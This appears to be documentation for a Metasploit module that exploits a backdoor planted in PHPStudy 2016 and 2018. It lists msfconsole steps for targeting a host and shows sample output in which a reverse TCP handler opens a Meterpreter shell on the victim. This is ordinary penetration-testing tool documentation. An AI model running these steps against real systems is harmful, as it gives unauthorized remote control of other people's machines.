## Description

PHPStudy is a free, one-click installer that bundles PHP, MySQL, Apache and more. At some point, attackers compromised phpStudy and tampered with the 2016 and 2018 versions of the software, making them vulnerable to this exploit.

## Vulnerable Application

The vulnerability exists in the php-5.4.45 and php-5.2.17 service versions in PHPStudy2016 and PHPStudy2018.

## Verification Steps

1. Start msfconsole
2. Do: ```use exploit/multi/http/phpstudy_backdoor_rce```
3. Do: ```set rhosts <target>```
4. Do: ```run```

If your target is vulnerable, you will get a shell.
You should see output similar to the following:

```
msf5 exploit(multi/http/phpstudy_backdoor_rce) > set rhosts 192.168.56.104
rhosts => 192.168.56.104
msf5 exploit(multi/http/phpstudy_backdoor_rce) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Sending shellcode
[*] Sending stage (38288 bytes) to 192.168.56.104
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.104:49169) at 2020-02-23 10:11:40 +0800

meterpreter >
```